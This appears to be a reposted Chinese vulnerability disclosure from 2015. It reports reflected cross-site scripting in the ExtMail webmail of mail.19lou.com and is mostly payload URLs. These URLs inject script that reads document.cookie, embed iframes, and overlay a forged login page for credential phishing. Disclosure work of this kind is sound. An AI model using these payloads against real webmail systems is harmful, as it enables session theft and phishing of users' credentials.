十九楼某关键内部系统跨站伪造登陆框

1.跨站

2.伪造登陆框

邮箱系统:

https://mail.19lou.com/extmail/cgi/index.cgi

extmail几处反射性跨站,

https://mail.19lou.com/extmail/cgi/index.cgi?__mode=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&error=badlogi

https://mail.19lou.com//extman/cgi/signup.cgi?domain=%3Cscript%3Ealert%28document.cookie%29%3C/script%3

....

加载ifream

https://mail.19lou.com//extman/cgi/signup.cgi?domain=%3Ciframe%20src=%22http://wooyun.org%22%20width=%22500%22%20height=%22180%22%3E&error=badlogi

(图略)

伪造登陆框

https://mail.19lou.com/extmail/cgi/index.cgi?__mode=%22%3E%3Ciframe%20src=%22http://127.0.0.1/false.htm%22%20width=%22800%22%20height=%22980%22%20frameborder=0%20%3E%20&error=badlogi

伪造效果还行:

十九楼某关键内部系统跨站伪造登陆框

加载的外部false.htm

十九楼某关键内部系统跨站伪造登陆框

false.htm内容

十九楼某关键内部系统跨站伪造登陆框

修复方案:

貌似版本有点旧了

分类:默认分类 时间:2015-02-26 人气:1
本文关键词:
分享到:

相关文章

Copyright (C) quwantang.com, All Rights Reserved.

趣玩堂 版权所有 京ICP备15002868号

processed in 0.014 (s). 9 q(s)